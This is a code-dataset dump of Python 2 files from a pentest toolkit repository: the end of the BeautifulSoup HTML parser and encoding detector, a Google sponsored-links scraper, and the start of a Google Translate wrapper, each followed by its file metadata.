If anyone # was relying on the existence of markupMassage, this # might cause problems. del(self.markupMassage) self.reset() SGMLParser.feed(self, markup) # Close out any unfinished strings and close all the open tags. self.endData() while self.currentTag.name != self.ROOT_TAG_NAME: self.popTag() def __getattr__(self, methodName): """This method routes method call requests to either the SGMLParser superclass or the Tag superclass, depending on the method name.""" #print "__getattr__ called on %s.%s" % (self.__class__, methodName) if methodName.find('start_') == 0 or methodName.find('end_') == 0 \ or methodName.find('do_') == 0: return SGMLParser.__getattr__(self, methodName) elif methodName.find('__') != 0: return Tag.__getattr__(self, methodName) else: raise AttributeError def isSelfClosingTag(self, name): """Returns true iff the given string is the name of a self-closing tag according to this parser.""" return self.SELF_CLOSING_TAGS.has_key(name) \ or self.instanceSelfClosingTags.has_key(name) def reset(self): Tag.__init__(self, self, self.ROOT_TAG_NAME) self.hidden = 1 SGMLParser.reset(self) self.currentData = [] self.currentTag = None self.tagStack = [] self.quoteStack = [] self.pushTag(self) def popTag(self): tag = self.tagStack.pop() # Tags with just one string-owning child get the child as a # 'string' property, so that soup.tag.string is shorthand for # soup.tag.contents[0] if len(self.currentTag.contents) == 1 and \ isinstance(self.currentTag.contents[0], NavigableString): self.currentTag.string = self.currentTag.contents[0] #print "Pop", tag.name if self.tagStack: self.currentTag = self.tagStack[-1] return self.currentTag def pushTag(self, tag): #print "Push", tag.name if self.currentTag: self.currentTag.contents.append(tag) self.tagStack.append(tag) self.currentTag = self.tagStack[-1] def endData(self, containerClass=NavigableString): if self.currentData: currentData = ''.join(self.currentData) if not currentData.translate(self.STRIP_ASCII_SPACES): if '\n' in currentData: currentData = '\n' else: currentData = ' ' self.currentData = [] if self.parseOnlyThese and len(self.tagStack) <= 1 and \ (not self.parseOnlyThese.text or \ not self.parseOnlyThese.search(currentData)): return o = containerClass(currentData) o.setup(self.currentTag, self.previous) if self.previous: self.previous.next = o self.previous = o self.currentTag.contents.append(o) def _popToTag(self, name, inclusivePop=True): """Pops the tag stack up to and including the most recent instance of the given tag. If inclusivePop is false, pops the tag stack up to but *not* including the most recent instqance of the given tag.""" #print "Popping to %s" % name if name == self.ROOT_TAG_NAME: return numPops = 0 mostRecentTag = None for i in range(len(self.tagStack)-1, 0, -1): if name == self.tagStack[i].name: numPops = len(self.tagStack)-i break if not inclusivePop: numPops = numPops - 1 for i in range(0, numPops): mostRecentTag = self.popTag() return mostRecentTag def _smartPop(self, name): """We need to pop up to the previous tag of this type, unless one of this tag's nesting reset triggers comes between this tag and the previous tag of this type, OR unless this tag is a generic nesting trigger and another generic nesting trigger comes between this tag and the previous tag of this type. Examples: <p>Foo<b>Bar *<p>* should pop to 'p', not 'b'. <p>Foo<table>Bar *<p>* should pop to 'table', not 'p'. <p>Foo<table><tr>Bar *<p>* should pop to 'tr', not 'p'. <li><ul><li> *<li>* should pop to 'ul', not the first 'li'. <tr><table><tr> *<tr>* should pop to 'table', not the first 'tr' <td><tr><td> *<td>* should pop to 'tr', not the first 'td' """ nestingResetTriggers = self.NESTABLE_TAGS.get(name) isNestable = nestingResetTriggers != None isResetNesting = self.RESET_NESTING_TAGS.has_key(name) popTo = None inclusive = True for i in range(len(self.tagStack)-1, 0, -1): p = self.tagStack[i] if (not p or p.name == name) and not isNestable: #Non-nestable tags get popped to the top or to their #last occurance. popTo = name break if (nestingResetTriggers != None and p.name in nestingResetTriggers) \ or (nestingResetTriggers == None and isResetNesting and self.RESET_NESTING_TAGS.has_key(p.name)): #If we encounter one of the nesting reset triggers #peculiar to this tag, or we encounter another tag #that causes nesting to reset, pop up to but not #including that tag. popTo = p.name inclusive = False break p = p.parent if popTo: self._popToTag(popTo, inclusive) def unknown_starttag(self, name, attrs, selfClosing=0): #print "Start tag %s: %s" % (name, attrs) if self.quoteStack: #This is not a real tag. #print "<%s> is not real!" % name attrs = ''.join(map(lambda(x, y): ' %s="%s"' % (x, y), attrs)) self.handle_data('<%s%s>' % (name, attrs)) return self.endData() if not self.isSelfClosingTag(name) and not selfClosing: self._smartPop(name) if self.parseOnlyThese and len(self.tagStack) <= 1 \ and (self.parseOnlyThese.text or not self.parseOnlyThese.searchTag(name, attrs)): return tag = Tag(self, name, attrs, self.currentTag, self.previous) if self.previous: self.previous.next = tag self.previous = tag self.pushTag(tag) if selfClosing or self.isSelfClosingTag(name): self.popTag() if name in self.QUOTE_TAGS: #print "Beginning quote (%s)" % name self.quoteStack.append(name) self.literal = 1 return tag def unknown_endtag(self, name): #print "End tag %s" % name if self.quoteStack and self.quoteStack[-1] != name: #This is not a real end tag. #print "</%s> is not real!" % name self.handle_data('</%s>' % name) return self.endData() self._popToTag(name) if self.quoteStack and self.quoteStack[-1] == name: self.quoteStack.pop() self.literal = (len(self.quoteStack) > 0) def handle_data(self, data): self.currentData.append(data) def _toStringSubclass(self, text, subclass): """Adds a certain piece of text to the tree as a NavigableString subclass.""" self.endData() self.handle_data(text) self.endData(subclass) def handle_pi(self, text): """Handle a processing instruction as a ProcessingInstruction object, possibly one with a %SOUP-ENCODING% slot into which an encoding will be plugged later.""" if text[:3] == "xml": text = u"xml version='1.0' encoding='%SOUP-ENCODING%'" self._toStringSubclass(text, ProcessingInstruction) def handle_comment(self, text): "Handle comments as Comment objects." self._toStringSubclass(text, Comment) def handle_charref(self, ref): "Handle character references as data." if self.convertEntities: data = unichr(int(ref)) else: data = '&#%s;' % ref self.handle_data(data) def handle_entityref(self, ref): """Handle entity references as data, possibly converting known HTML and/or XML entity references to the corresponding Unicode characters.""" data = None if self.convertHTMLEntities: try: data = unichr(name2codepoint[ref]) except KeyError: pass if not data and self.convertXMLEntities: data = self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref) if not data and self.convertHTMLEntities and \ not self.XML_ENTITIES_TO_SPECIAL_CHARS.get(ref): # TODO: We've got a problem here. We're told this is # an entity reference, but it's not an XML entity # reference or an HTML entity reference. Nonetheless, # the logical thing to do is to pass it through as an # unrecognized entity reference. # # Except: when the input is "&carol;" this function # will be called with input "carol". When the input is # "AT&T", this function will be called with input # "T". We have no way of knowing whether a semicolon # was present originally, so we don't know whether # this is an unknown entity or just a misplaced # ampersand. # # The more common case is a misplaced ampersand, so I # escape the ampersand and omit the trailing semicolon. data = "&amp;%s" % ref if not data: # This case is different from the one above, because we # haven't already gone through a supposedly comprehensive # mapping of entities to Unicode characters. We might not # have gone through any mapping at all. So the chances are # very high that this is a real entity, and not a # misplaced ampersand. data = "&%s;" % ref self.handle_data(data) def handle_decl(self, data): "Handle DOCTYPEs and the like as Declaration objects." self._toStringSubclass(data, Declaration) def parse_declaration(self, i): """Treat a bogus SGML declaration as raw data. Treat a CDATA declaration as a CData object.""" j = None if self.rawdata[i:i+9] == '<![CDATA[': k = self.rawdata.find(']]>', i) if k == -1: k = len(self.rawdata) data = self.rawdata[i+9:k] j = k+3 self._toStringSubclass(data, CData) else: try: j = SGMLParser.parse_declaration(self, i) except SGMLParseError: toHandle = self.rawdata[i:] self.handle_data(toHandle) j = i + len(toHandle) return j class BeautifulSoup(BeautifulStoneSoup): """This parser knows the following facts about HTML: * Some tags have no closing tag and should be interpreted as being closed as soon as they are encountered. * The text inside some tags (ie. 'script') may contain tags which are not really part of the document and which should be parsed as text, not tags. If you want to parse the text as tags, you can always fetch it and parse it explicitly. * Tag nesting rules: Most tags can't be nested at all. For instance, the occurance of a <p> tag should implicitly close the previous <p> tag. <p>Para1<p>Para2 should be transformed into: <p>Para1</p><p>Para2 Some tags can be nested arbitrarily. For instance, the occurance of a <blockquote> tag should _not_ implicitly close the previous <blockquote> tag. Alice said: <blockquote>Bob said: <blockquote>Blah should NOT be transformed into: Alice said: <blockquote>Bob said: </blockquote><blockquote>Blah Some tags can be nested, but the nesting is reset by the interposition of other tags. For instance, a <tr> tag should implicitly close the previous <tr> tag within the same <table>, but not close a <tr> tag in another table. <table><tr>Blah<tr>Blah should be transformed into: <table><tr>Blah</tr><tr>Blah but, <tr>Blah<table><tr>Blah should NOT be transformed into <tr>Blah<table></tr><tr>Blah Differing assumptions about tag nesting rules are a major source of problems with the BeautifulSoup class. If BeautifulSoup is not treating as nestable a tag your page author treats as nestable, try ICantBelieveItsBeautifulSoup, MinimalSoup, or BeautifulStoneSoup before writing your own subclass.""" def __init__(self, *args, **kwargs): if not kwargs.has_key('smartQuotesTo'): kwargs['smartQuotesTo'] = self.HTML_ENTITIES BeautifulStoneSoup.__init__(self, *args, **kwargs) SELF_CLOSING_TAGS = buildTagMap(None, ['br' , 'hr', 'input', 'img', 'meta', 'spacer', 'link', 'frame', 'base']) QUOTE_TAGS = {'script' : None, 'textarea' : None} #According to the HTML standard, each of these inline tags can #contain another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_INLINE_TAGS = ['span', 'font', 'q', 'object', 'bdo', 'sub', 'sup', 'center'] #According to the HTML standard, these block tags can contain #another tag of the same type. Furthermore, it's common #to actually use these tags this way. NESTABLE_BLOCK_TAGS = ['blockquote', 'div', 'fieldset', 'ins', 'del'] #Lists can contain other lists, but there are restrictions. NESTABLE_LIST_TAGS = { 'ol' : [], 'ul' : [], 'li' : ['ul', 'ol'], 'dl' : [], 'dd' : ['dl'], 'dt' : ['dl'] } #Tables can contain other tables, but there are restrictions. NESTABLE_TABLE_TAGS = {'table' : [], 'tr' : ['table', 'tbody', 'tfoot', 'thead'], 'td' : ['tr'], 'th' : ['tr'], 'thead' : ['table'], 'tbody' : ['table'], 'tfoot' : ['table'], } NON_NESTABLE_BLOCK_TAGS = ['address', 'form', 'p', 'pre'] #If one of these tags is encountered, all tags up to the next tag of #this type are popped. RESET_NESTING_TAGS = buildTagMap(None, NESTABLE_BLOCK_TAGS, 'noscript', NON_NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) NESTABLE_TAGS = buildTagMap([], NESTABLE_INLINE_TAGS, NESTABLE_BLOCK_TAGS, NESTABLE_LIST_TAGS, NESTABLE_TABLE_TAGS) # Used to detect the charset in a META tag; see start_meta CHARSET_RE = re.compile("((^|;)\s*charset=)([^;]*)") def start_meta(self, attrs): """Beautiful Soup can detect a charset included in a META tag, try to convert the document to that charset, and re-parse the document from the beginning.""" httpEquiv = None contentType = None contentTypeIndex = None tagNeedsEncodingSubstitution = False for i in range(0, len(attrs)): key, value = attrs[i] key = key.lower() if key == 'http-equiv': httpEquiv = value elif key == 'content': contentType = value contentTypeIndex = i if httpEquiv and contentType: # It's an interesting meta tag. match = self.CHARSET_RE.search(contentType) if match: if getattr(self, 'declaredHTMLEncoding') or \ (self.originalEncoding == self.fromEncoding): # This is our second pass through the document, or # else an encoding was specified explicitly and it # worked. Rewrite the meta tag. newAttr = self.CHARSET_RE.sub\ (lambda(match):match.group(1) + "%SOUP-ENCODING%", contentType) attrs[contentTypeIndex] = (attrs[contentTypeIndex][0], newAttr) tagNeedsEncodingSubstitution = True else: # This is our first pass through the document. # Go through it again with the new information. newCharset = match.group(3) if newCharset and newCharset != self.originalEncoding: self.declaredHTMLEncoding = newCharset self._feed(self.declaredHTMLEncoding) raise StopParsing tag = self.unknown_starttag("meta", attrs) if tag and tagNeedsEncodingSubstitution: tag.containsSubstitutions = True class StopParsing(Exception): pass class ICantBelieveItsBeautifulSoup(BeautifulSoup): """The BeautifulSoup class is oriented towards skipping over common HTML errors like unclosed tags. However, sometimes it makes errors of its own. For instance, consider this fragment: <b>Foo<b>Bar</b></b> This is perfectly valid (if bizarre) HTML. However, the BeautifulSoup class will implicitly close the first b tag when it encounters the second 'b'. It will think the author wrote "<b>Foo<b>Bar", and didn't close the first 'b' tag, because there's no real-world reason to bold something that's already bold. When it encounters '</b></b>' it will close two more 'b' tags, for a grand total of three tags closed instead of two. This can throw off the rest of your document structure. The same is true of a number of other tags, listed below. It's much more common for someone to forget to close a 'b' tag than to actually use nested 'b' tags, and the BeautifulSoup class handles the common case. This class handles the not-co-common case: where you can't believe someone wrote what they did, but it's valid HTML and BeautifulSoup screwed up by assuming it wouldn't be.""" I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS = \ ['em', 'big', 'i', 'small', 'tt', 'abbr', 'acronym', 'strong', 'cite', 'code', 'dfn', 'kbd', 'samp', 'strong', 'var', 'b', 'big'] I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS = ['noscript'] NESTABLE_TAGS = buildTagMap([], BeautifulSoup.NESTABLE_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_BLOCK_TAGS, I_CANT_BELIEVE_THEYRE_NESTABLE_INLINE_TAGS) class MinimalSoup(BeautifulSoup): """The MinimalSoup class is for parsing HTML that contains pathologically bad markup. It makes no assumptions about tag nesting, but it does know which tags are self-closing, that <script> tags contain Javascript and should not be parsed, that META tags may contain encoding information, and so on. This also makes it better for subclassing than BeautifulStoneSoup or BeautifulSoup.""" RESET_NESTING_TAGS = buildTagMap('noscript') NESTABLE_TAGS = {} class BeautifulSOAP(BeautifulStoneSoup): """This class will push a tag with only a single string child into the tag's parent as an attribute. The attribute's name is the tag name, and the value is the string child. An example should give the flavor of the change: <foo><bar>baz</bar></foo> => <foo bar="baz"><bar>baz</bar></foo> You can then access fooTag['bar'] instead of fooTag.barTag.string. This is, of course, useful for scraping structures that tend to use subelements instead of attributes, such as SOAP messages. Note that it modifies its input, so don't print the modified version out. I'm not sure how many people really want to use this class; let me know if you do. Mainly I like the name.""" def popTag(self): if len(self.tagStack) > 1: tag = self.tagStack[-1] parent = self.tagStack[-2] parent._getAttrMap() if (isinstance(tag, Tag) and len(tag.contents) == 1 and isinstance(tag.contents[0], NavigableString) and not parent.attrMap.has_key(tag.name)): parent[tag.name] = tag.contents[0] BeautifulStoneSoup.popTag(self) #Enterprise class names! It has come to our attention that some people #think the names of the Beautiful Soup parser classes are too silly #and "unprofessional" for use in enterprise screen-scraping. We feel #your pain! For such-minded folk, the Beautiful Soup Consortium And #All-Night Kosher Bakery recommends renaming this file to #"RobustParser.py" (or, in cases of extreme enterprisiness, #"RobustParserBeanInterface.class") and using the following #enterprise-friendly class aliases: class RobustXMLParser(BeautifulStoneSoup): pass class RobustHTMLParser(BeautifulSoup): pass class RobustWackAssHTMLParser(ICantBelieveItsBeautifulSoup): pass class RobustInsanelyWackAssHTMLParser(MinimalSoup): pass class SimplifyingSOAPParser(BeautifulSOAP): pass ###################################################### # # Bonus library: Unicode, Dammit # # This class forces XML data into a standard format (usually to UTF-8 # or Unicode). It is heavily based on code from Mark Pilgrim's # Universal Feed Parser. It does not rewrite the XML or HTML to # reflect a new encoding: that happens in BeautifulStoneSoup.handle_pi # (XML) and BeautifulSoup.start_meta (HTML). # Autodetects character encodings. # Download from http://chardet.feedparser.org/ try: import chardet # import chardet.constants # chardet.constants._debug = 1 except ImportError: chardet = None # cjkcodecs and iconv_codec make Python know about more character encodings. # Both are available from http://cjkpython.i18n.org/ # They're built in if you use Python 2.4. try: import cjkcodecs.aliases except ImportError: pass try: import iconv_codec except ImportError: pass class UnicodeDammit: """A class for detecting the encoding of a *ML document and converting it to a Unicode string. If the source encoding is windows-1252, can replace MS smart quotes with their HTML or XML equivalents.""" # This dictionary maps commonly seen values for "charset" in HTML # meta tags to the corresponding Python codec names. It only covers # values that aren't in Python's aliases and can't be determined # by the heuristics in find_codec. CHARSET_ALIASES = { "macintosh" : "mac-roman", "x-sjis" : "shift-jis" } def __init__(self, markup, overrideEncodings=[], smartQuotesTo='xml'): self.markup, documentEncoding, sniffedEncoding = \ self._detectEncoding(markup) self.smartQuotesTo = smartQuotesTo self.triedEncodings = [] if markup == '' or isinstance(markup, unicode): self.originalEncoding = None self.unicode = unicode(markup) return u = None for proposedEncoding in overrideEncodings: u = self._convertFrom(proposedEncoding) if u: break if not u: for proposedEncoding in (documentEncoding, sniffedEncoding): u = self._convertFrom(proposedEncoding) if u: break # If no luck and we have auto-detection library, try that: if not u and chardet and not isinstance(self.markup, unicode): u = self._convertFrom(chardet.detect(self.markup)['encoding']) # As a last resort, try utf-8 and windows-1252: if not u: for proposed_encoding in ("utf-8", "windows-1252"): u = self._convertFrom(proposed_encoding) if u: break self.unicode = u if not u: self.originalEncoding = None def _subMSChar(self, orig): """Changes a MS smart quote character to an XML or HTML entity.""" sub = self.MS_CHARS.get(orig) if type(sub) == types.TupleType: if self.smartQuotesTo == 'xml': sub = '&#x%s;' % sub[1] else: sub = '&%s;' % sub[0] return sub def _convertFrom(self, proposed): proposed = self.find_codec(proposed) if not proposed or proposed in self.triedEncodings: return None self.triedEncodings.append(proposed) markup = self.markup # Convert smart quotes to HTML if coming from an encoding # that might have them. if self.smartQuotesTo and proposed.lower() in("windows-1252", "iso-8859-1", "iso-8859-2"): markup = re.compile("([\x80-\x9f])").sub \ (lambda(x): self._subMSChar(x.group(1)), markup) try: # print "Trying to convert document to %s" % proposed u = self._toUnicode(markup, proposed) self.markup = u self.originalEncoding = proposed except Exception, e: # print "That didn't work!" # print e return None #print "Correct encoding: %s" % proposed return self.markup def _toUnicode(self, data, encoding): '''Given a string and its encoding, decodes the string into Unicode. %encoding is a string recognized by encodings.aliases''' # strip Byte Order Mark (if present) if (len(data) >= 4) and (data[:2] == '\xfe\xff') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16be' data = data[2:] elif (len(data) >= 4) and (data[:2] == '\xff\xfe') \ and (data[2:4] != '\x00\x00'): encoding = 'utf-16le' data = data[2:] elif data[:3] == '\xef\xbb\xbf': encoding = 'utf-8' data = data[3:] elif data[:4] == '\x00\x00\xfe\xff': encoding = 'utf-32be' data = data[4:] elif data[:4] == '\xff\xfe\x00\x00': encoding = 'utf-32le' data = data[4:] newdata = unicode(data, encoding) return newdata def _detectEncoding(self, xml_data): """Given a document, tries to detect its XML encoding.""" xml_encoding = sniffed_xml_encoding = None try: if xml_data[:4] == '\x4c\x6f\xa7\x94': # EBCDIC xml_data = self._ebcdic_to_ascii(xml_data) elif xml_data[:4] == '\x00\x3c\x00\x3f': # UTF-16BE sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data, 'utf-16be').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xfe\xff') \ and (xml_data[2:4] != '\x00\x00'): # UTF-16BE with BOM sniffed_xml_encoding = 'utf-16be' xml_data = unicode(xml_data[2:], 'utf-16be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x3f\x00': # UTF-16LE sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data, 'utf-16le').encode('utf-8') elif (len(xml_data) >= 4) and (xml_data[:2] == '\xff\xfe') and \ (xml_data[2:4] != '\x00\x00'): # UTF-16LE with BOM sniffed_xml_encoding = 'utf-16le' xml_data = unicode(xml_data[2:], 'utf-16le').encode('utf-8') elif xml_data[:4] == '\x00\x00\x00\x3c': # UTF-32BE sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data, 'utf-32be').encode('utf-8') elif xml_data[:4] == '\x3c\x00\x00\x00': # UTF-32LE sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data, 'utf-32le').encode('utf-8') elif xml_data[:4] == '\x00\x00\xfe\xff': # UTF-32BE with BOM sniffed_xml_encoding = 'utf-32be' xml_data = unicode(xml_data[4:], 'utf-32be').encode('utf-8') elif xml_data[:4] == '\xff\xfe\x00\x00': # UTF-32LE with BOM sniffed_xml_encoding = 'utf-32le' xml_data = unicode(xml_data[4:], 'utf-32le').encode('utf-8') elif xml_data[:3] == '\xef\xbb\xbf': # UTF-8 with BOM sniffed_xml_encoding = 'utf-8' xml_data = unicode(xml_data[3:], 'utf-8').encode('utf-8') else: sniffed_xml_encoding = 'ascii' pass xml_encoding_match = re.compile \ ('^<\?.*encoding=[\'"](.*?)[\'"].*\?>')\ .match(xml_data) except: xml_encoding_match = None if xml_encoding_match: xml_encoding = xml_encoding_match.groups()[0].lower() if sniffed_xml_encoding and \ (xml_encoding in ('iso-10646-ucs-2', 'ucs-2', 'csunicode', 'iso-10646-ucs-4', 'ucs-4', 'csucs4', 'utf-16', 'utf-32', 'utf_16', 'utf_32', 'utf16', 'u16')): xml_encoding = sniffed_xml_encoding return xml_data, xml_encoding, sniffed_xml_encoding def find_codec(self, charset): return self._codec(self.CHARSET_ALIASES.get(charset, charset)) \ or (charset and self._codec(charset.replace("-", ""))) \ or (charset and self._codec(charset.replace("-", "_"))) \ or charset def _codec(self, charset): if not charset: return charset codec = None try: codecs.lookup(charset) codec = charset except (LookupError, ValueError): pass return codec EBCDIC_TO_ASCII_MAP = None def _ebcdic_to_ascii(self, s): c = self.__class__ if not c.EBCDIC_TO_ASCII_MAP: emap = (0,1,2,3,156,9,134,127,151,141,142,11,12,13,14,15, 16,17,18,19,157,133,8,135,24,25,146,143,28,29,30,31, 128,129,130,131,132,10,23,27,136,137,138,139,140,5,6,7, 144,145,22,147,148,149,150,4,152,153,154,155,20,21,158,26, 32,160,161,162,163,164,165,166,167,168,91,46,60,40,43,33, 38,169,170,171,172,173,174,175,176,177,93,36,42,41,59,94, 45,47,178,179,180,181,182,183,184,185,124,44,37,95,62,63, 186,187,188,189,190,191,192,193,194,96,58,35,64,39,61,34, 195,97,98,99,100,101,102,103,104,105,196,197,198,199,200, 201,202,106,107,108,109,110,111,112,113,114,203,204,205, 206,207,208,209,126,115,116,117,118,119,120,121,122,210, 211,212,213,214,215,216,217,218,219,220,221,222,223,224, 225,226,227,228,229,230,231,123,65,66,67,68,69,70,71,72, 73,232,233,234,235,236,237,125,74,75,76,77,78,79,80,81, 82,238,239,240,241,242,243,92,159,83,84,85,86,87,88,89, 90,244,245,246,247,248,249,48,49,50,51,52,53,54,55,56,57, 250,251,252,253,254,255) import string c.EBCDIC_TO_ASCII_MAP = string.maketrans( \ ''.join(map(chr, range(256))), ''.join(map(chr, emap))) return s.translate(c.EBCDIC_TO_ASCII_MAP) MS_CHARS = { '\x80' : ('euro', '20AC'), '\x81' : ' ', '\x82' : ('sbquo', '201A'), '\x83' : ('fnof', '192'), '\x84' : ('bdquo', '201E'), '\x85' : ('hellip', '2026'), '\x86' : ('dagger', '2020'), '\x87' : ('Dagger', '2021'), '\x88' : ('circ', '2C6'), '\x89' : ('permil', '2030'), '\x8A' : ('Scaron', '160'), '\x8B' : ('lsaquo', '2039'), '\x8C' : ('OElig', '152'), '\x8D' : '?', '\x8E' : ('#x17D', '17D'), '\x8F' : '?', '\x90' : '?', '\x91' : ('lsquo', '2018'), '\x92' : ('rsquo', '2019'), '\x93' : ('ldquo', '201C'), '\x94' : ('rdquo', '201D'), '\x95' : ('bull', '2022'), '\x96' : ('ndash', '2013'), '\x97' : ('mdash', '2014'), '\x98' : ('tilde', '2DC'), '\x99' : ('trade', '2122'), '\x9a' : ('scaron', '161'), '\x9b' : ('rsaquo', '203A'), '\x9c' : ('oelig', '153'), '\x9d' : '?', '\x9e' : ('#x17E', '17E'), '\x9f' : ('Yuml', ''),} ####################################################################### #By default, act as an HTML pretty-printer. if __name__ == '__main__': import sys soup = BeautifulSoup(sys.stdin.read()) print soup.prettify()
76,364
Python
.py
1,672
34.244617
186
0.583169
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,918
sponsoredlinks.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/sponsoredlinks.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-sponsored-links-search/ # # Code is licensed under MIT license. # import re import urllib import random from htmlentitydefs import name2codepoint from BeautifulSoup import BeautifulSoup from browser import Browser, BrowserError # # TODO: join GoogleSearch and SponsoredLinks classes under a single base class # class SLError(Exception): """ Sponsored Links Error """ pass class SLParseError(Exception): """ Parse error in Google results. self.msg attribute contains explanation why parsing failed self.tag attribute contains BeautifulSoup object with the most relevant tag that failed to parse Thrown only in debug mode """ def __init__(self, msg, tag): self.msg = msg self.tag = tag def __str__(self): return self.msg def html(self): return self.tag.prettify() GET_ALL_SLEEP_FUNCTION = object() class SponsoredLink(object): """ a single sponsored link """ def __init__(self, title, url, display_url, desc): self.title = title self.url = url self.display_url = display_url self.desc = desc class SponsoredLinks(object): SEARCH_URL_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&btnG=Search+Sponsored+Links&hl=en" NEXT_PAGE_0 = "http://www.google.com/sponsoredlinks?q=%(query)s&sa=N&start=%(start)d&hl=en" SEARCH_URL_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&btnG=Search+Sponsored+Links&hl=en" NEXT_PAGE_1 = "http://www.google.com/sponsoredlinks?q=%(query)s&num=%(num)d&sa=N&start=%(start)d&hl=en" def __init__(self, query, random_agent=False, debug=False): self.query = query self.debug = debug self.browser = Browser(debug=debug) self._page = 0 self.eor = False self.results_info = None self._results_per_page = 10 if random_agent: self.browser.set_random_user_agent() @property def num_results(self): if not self.results_info: page = self._get_results_page() self.results_info = self._extract_info(page) if self.results_info['total'] == 0: self.eor = True return self.results_info['total'] def _get_results_per_page(self): return self._results_per_page def _set_results_par_page(self, rpp): self._results_per_page = rpp results_per_page = property(_get_results_per_page, _set_results_par_page) def get_results(self): if self.eor: return [] page = self._get_results_page() info = self._extract_info(page) if self.results_info is None: self.results_info = info if info['to'] == info['total']: self.eor = True results = self._extract_results(page) if not results: self.eor = True return [] self._page += 1 return results def _get_all_results_sleep_fn(self): return random.random()*5 + 1 # sleep from 1 - 6 seconds def get_all_results(self, sleep_function=None): if sleep_function is GET_ALL_SLEEP_FUNCTION: sleep_function = self._get_all_results_sleep_fn if sleep_function is None: sleep_function = lambda: None ret_results = [] while True: res = self.get_results() if not res: return ret_results ret_results.extend(res) return ret_results def _maybe_raise(self, cls, *arg): if self.debug: raise cls(*arg) def _extract_info(self, soup): empty_info = { 'from': 0, 'to': 0, 'total': 0 } stats_span = soup.find('span', id='stats') if not stats_span: return empty_info txt = ''.join(stats_span.findAll(text=True)) txt = txt.replace(',', '').replace("&nbsp;", ' ') matches = re.search(r'Results (\d+) - (\d+) of (?:about )?(\d+)', txt) if not matches: return empty_info return {'from': int(matches.group(1)), 'to': int(matches.group(2)), 'total': int(matches.group(3))} def _get_results_page(self): if self._page == 0: if self._results_per_page == 10: url = SponsoredLinks.SEARCH_URL_0 else: url = SponsoredLinks.SEARCH_URL_1 else: if self._results_per_page == 10: url = SponsoredLinks.NEXT_PAGE_0 else: url = SponsoredLinks.NEXT_PAGE_1 safe_url = url % { 'query': urllib.quote_plus(self.query), 'start': self._page * self._results_per_page, 'num': self._results_per_page } try: page = self.browser.get_page(safe_url) except BrowserError, e: raise SLError, "Failed getting %s: %s" % (e.url, e.error) return BeautifulSoup(page) def _extract_results(self, soup): results = soup.findAll('div', {'class': 'g'}) ret_res = [] for result in results: eres = self._extract_result(result) if eres: ret_res.append(eres) return ret_res def _extract_result(self, result): title, url = self._extract_title_url(result) display_url = self._extract_display_url(result) # Warning: removes 'cite' from the result desc = self._extract_description(result) if not title or not url or not display_url or not desc: return None return SponsoredLink(title, url, display_url, desc) def _extract_title_url(self, result): title_a = result.find('a') if not title_a: self._maybe_raise(SLParseError, "Title tag in sponsored link was not found", result) return None, None title = ''.join(title_a.findAll(text=True)) title = self._html_unescape(title) url = title_a['href'] match = re.search(r'q=(http[^&]+)&', url) if not match: self._maybe_raise(SLParseError, "URL inside a sponsored link was not found", result) return None, None url = urllib.unquote(match.group(1)) return title, url def _extract_display_url(self, result): cite = result.find('cite') if not cite: self._maybe_raise(SLParseError, "<cite> not found inside result", result) return None return ''.join(cite.findAll(text=True)) def _extract_description(self, result): cite = result.find('cite') if not cite: return None cite.extract() desc_div = result.find('div', {'class': 'line23'}) if not desc_div: self._maybe_raise(ParseError, "Description tag not found in sponsored link", result) return None desc_strs = desc_div.findAll(text=True)[0:-1] desc = ''.join(desc_strs) desc = desc.replace("\n", " ") desc = desc.replace(" ", " ") return self._html_unescape(desc) def _html_unescape(self, str): def entity_replacer(m): entity = m.group(1) if entity in name2codepoint: return unichr(name2codepoint[entity]) else: return m.group(0) def ascii_replacer(m): cp = int(m.group(1)) if cp <= 255: return unichr(cp) else: return m.group(0) s = re.sub(r'&#(\d+);', ascii_replacer, str, re.U) return re.sub(r'&([^;]+);', entity_replacer, s, re.U)
7,999
Python
.py
197
30.360406
116
0.574666
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,919
translate.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/translate.py
#!/usr/bin/python # # Peteris Krumins (peter@catonmat.net) # http://www.catonmat.net -- good coders code, great reuse # # http://www.catonmat.net/blog/python-library-for-google-translate/ # # Code is licensed under MIT license. # from browser import Browser, BrowserError from urllib import quote_plus import simplejson as json class TranslationError(Exception): pass class Translator(object): translate_url = "http://ajax.googleapis.com/ajax/services/language/translate?v=1.0&q=%(message)s&langpair=%(from)s%%7C%(to)s" def __init__(self): self.browser = Browser() def translate(self, message, lang_to='en', lang_from=''): """ Given a 'message' translate it from 'lang_from' to 'lang_to'. If 'lang_from' is empty, auto-detects the language. Returns the translated message. """ if lang_to not in _languages: raise TranslationError, "Language %s is not supported as lang_to." % lang_to if lang_from not in _languages and lang_from != '': raise TranslationError, "Language %s is not supported as lang_from." % lang_from message = quote_plus(message) real_url = Translator.translate_url % { 'message': message, 'from': lang_from, 'to': lang_to } try: translation = self.browser.get_page(real_url) data = json.loads(translation) if data['responseStatus'] != 200: raise TranslationError, "Failed translating: %s" % data['responseDetails'] return data['responseData']['translatedText'] except BrowserError, e: raise TranslationError, "Failed translating (getting %s failed): %s" % (e.url, e.error) except ValueError, e: raise TranslationError, "Failed translating (json failed): %s" % e.message except KeyError, 